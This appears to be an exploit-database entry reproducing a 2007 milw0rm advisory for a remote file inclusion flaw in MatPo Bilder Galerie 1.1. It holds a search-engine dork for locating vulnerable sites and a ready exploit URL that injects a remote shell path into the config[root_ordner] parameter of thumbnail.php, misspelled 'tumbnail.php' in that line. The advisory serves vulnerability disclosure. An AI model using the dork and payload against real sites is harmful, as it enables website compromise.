header-logo
Suggest Exploit
vendor:
Bilder Galerie
by:
Crackers_Child
N/A
CVSS
MEDIUM
Remote File Include
98
CWE
Product Name: Bilder Galerie
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MatPo Bilder Galerie 1.1 Remote File Include Vulnerability

The vulnerability allows remote attackers to include arbitrary files via a URL in the config[root_ordner] parameter in thumbnail.php.

Mitigation:

Apply a patch or update to a newer version of the software.
Source

Exploit-DB raw data:

+______________________________________________By Crackers_Child___________________________________________+

*
*
*    [~] Script.......:       MatPo Bilder Galerie 1.1
*    [~] Download.....:       http://www.mapos-scripts.de/download,33.html
*    [~] Author.......:       Crackers_Child  | cybermilitan@hotmail.com & localexploit@hotmail.com
*    [~] Class........:       Remote File İnclude Vulnerability
*    [~] Dork.........:       intitle:Bilder Galerie 1.1 or intitle:Bilder Galerie
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*     
*
*       [~] Exploit Rfi...:     http://[Taget]/[Path]/includes/tumbnail.php?config[root_ordner]=sh3lz?
*
*                             
+_______________________________________________________________________________________________________________________+



        [~] İnfo......: f3ck y0ur l3fe
                      



+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*       [~] Special Thanx.......:    str0ke, BiyoSecurity.Net, SiberSavascilar.com And All F3ckers :)
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-12-30]